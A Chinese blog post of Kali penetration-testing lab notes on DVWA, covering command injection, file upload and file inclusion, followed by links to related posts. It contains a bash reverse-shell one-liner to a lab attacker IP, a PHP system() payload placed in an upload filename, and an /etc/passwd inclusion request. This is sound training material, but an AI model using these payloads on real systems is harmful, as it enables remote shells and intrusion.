kali渗透测试与教学笔记5:

最新推荐文章于 2022-02-12 17:03:53 发布
最新推荐文章于 2022-02-12 17:03:53 发布
阅读量162 收藏
点赞数
分类专栏: kali 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105665754
版权

web命令执行、命令注入和文件上传漏洞

如:

  • sudo bash -i > & /dev/tcp/攻击机IP(192.168.208.154)/4444 0>&1
  • burpsuite截获数据包。点击“ACTION”,选择“Send to Repeater”

在Repeater标签下,对数据包进行修改。把filename=“<?php system('uname -a');die();?>.php”

  • 文件包含和文件上传漏洞

实验地址:http://10.10.10.129/dvwa/vulnerabilities/fi/?page=include.php

将page=后面的参数改为:/etc/passwd,执行即可返回系统的用户情况

实际比这个复杂的多。这个漏洞不但是文件包含,还是RFI:远程文件包含,允许攻击者执行远程主机文件。

也可以在msfconsole中,搜索与wordpress博客web应用相关的flash gallery wordpress plugin进行攻击

 

 

 

 

 

 

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BurpSuite 基本使用之暴力破解
白帽渗透笔记的博客
07-10 5474
0x01 之前使用 BurpSuite 进行了简单的请求修改演示,现在我们来使用 BurpSuite 进行账号密码爆破。 0x02 这次对漏洞靶场 Pikachu 进行爆破,这个靶场的第一关便是暴力破解。 0x03 基于表单的暴力破解 浏览器设置好代理,burp 开启拦截,输入账号密码,点击登录,burp 拦截到请求。 右键,选择 Send to Intruder。 然后来到 Intruder 界面,选择 Position,点击 Clear,清除默认的荷载,然后分别依次选
python-pip&python-webkit.tar.gz
04-17
原创 kali2020安装w3af时,无法定位软件包python-pip python-webkit的解决办法 配套软件包
如何使用burpsuite对网站进行暴力破解?
weixin_44267785的博客
11-04 2296
如何使用burpsuite对网站进行暴力破解? burpsuite是一款集成多种功能的渗透工具,这篇文章主要简单介绍burpsuite的功能及简单地暴力破解一个网站的方法过程。我们一般只需用到bs的三个模块proxy(代理模块)、intruder(暴力破解模块)以及repeater(中继模块)。 (1)在火狐浏览器中右上角选项的网络设置里,设置好代理服务器127.0.0.1:10086(这里的端口...
使用Burpsuite进行暴力破解
热门推荐
MZ21G的博客
12-27 1万+
Burpsuite是一款Web安全领域的跨平台工具,基于Java开发。它集成了很多用于发现常见web漏洞的模块,如Proxy、Spider、Scanner、Intruder、Repeater等。所有模块共享一个能处理并显示HTTP消息的扩展框架,模块之间无缝交换信息,可以大大提高完成Web题目的效率。 Burpsuite 的 Intruder模块包含Sniper、Battering ram、Pitchfork、Cluster bomb等四中攻击类型,可以方便的进行Fuzz等测试。在Proxy等模块,在想要测
kali渗透测试教学笔记4:XSS
lm19770429的专栏
04-21 296
靶机应用地址:http://10.10.10.129/mutillidae/index.php 想成功执行一个XSS有2步:攻击者数据没有被过滤掉、web应用返回的数据没有经过编码 因此一个安全的web应用要对特殊字符进行编码,最好是进行十六进制编码。 OWASP给出了防止XSS指南。国外网站不好访问,这里提供CSDN的两个地址: https://blog.csdn.net/aerchi/...
kali渗透测试教学笔记7:
lm19770429的专栏
04-23 336
windows服务渗透攻击实战——MS08-067安全漏洞
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
05-20
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
Kali Linux渗透测试技术详解
最新发布
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
kali打开可执行程序提示“bash:没有那个文件或目录”或者"bash: no such file or directory"的解决办法
fjh1997的博客
08-24 6528
一开始以为是chmod的问题,加了权限也无效,后来通过strings分析了软件所需要的库,按照即可 apt-get install lib32z1 原因是缺少32位的库,当然提示找不到文件了。 ...
kali2020安装w3af时,无法定位软件包python-pip python-webkit的解决办法
lm19770429的专栏
04-17 5320
w3af在kali2020下真心不好安装 一路坑坑拌伴 正常下载w3af,按要求解压在/root下 安装NPM包管理工具 apt install npm libyaml-dev libsqlite3-dev 补全python库环境 apt install python-dev build-essential libssl-dev libffi-dev libxml2-dev li...
Vulnhub之Web-Machine-N7
lm19770429的专栏
02-12 4011
靶机下载地址: Web Machine: (N7) ~ VulnHubWeb Machine: (N7), made by Duty Mastr. Download & walkthrough links are available.https://www.vulnhub.com/entry/web-machine-n7,756/Difficulty: Medium 常规做法: arp-scan -I eth0 -l :本地局域网IP地址扫描,个人感觉比nmap -sn 快 nmap -A
Kali下的Web漏洞扫描工具汇总:OpenVAS、nessus、acunetix、w3af等
lm19770429的专栏
05-23 3812
OpenVAS 更新kali apt-get update apt-get dist-upgrade 安装OpenVAS,这一步需要的时间非常久,需要下载很多文件,建议使用screen操作,避免shell中断 apt-get install openvas 安装配置OpenVAS openvas-setup 注意查看结束的时候会有提示自动生成的密码 User created with password '******'. 如果安装的时候有错误可以进行安装检测,按照提示修复 openvas-ch
vulnhub Earth:解题思路
lm19770429的专栏
01-28 3236
靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#download Earth is an easy box though you will likely find it more challenging t
kali:工具之hydra
lm19770429的专栏
05-11 2186
hydra:据说也有图形界面 看自身帮助绝对够用,关键是字典 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l L
kali:OWASP DVWA Vulnerability: Brute Force 暴力破解的具体实现
lm19770429的专栏
08-05 1565
首先给出正确的暴力破解命令: hydra -l admin -P /usr/share/wordlists/metasploit/password.lst 10.10.10.143 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low;PHPSESS.
Kali Linux渗透测试实战:安装与Metasploit应用
本文档详细介绍了Kali Linux的安装与使用,特别是对于渗透测试的学习和实践。Kali Linux是专为安全渗透测试设计的操作系统,继承了BackTrack的功能并持续更新,包含众多安全工具,便于专业人士进行测试和攻防演练。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值